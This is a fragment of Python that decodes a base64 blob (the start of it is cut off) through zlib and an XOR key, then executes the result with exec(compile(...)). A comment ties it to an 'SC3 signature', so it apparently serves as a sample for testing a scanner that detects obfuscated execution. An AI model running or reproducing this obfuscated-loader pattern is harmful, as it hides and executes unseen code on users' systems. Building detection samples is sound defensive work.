/44xdZY8IhBOfZM9rexEThVMtBxVB3AcJT+TglUm+KvT51sn7bn34AIq0qwCobOdn2RoudX/fsJFb/eT+R5vv3/wAUj0CQ"
_K = bytes.fromhex("340dbf33738fe342ee5cb2b1")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
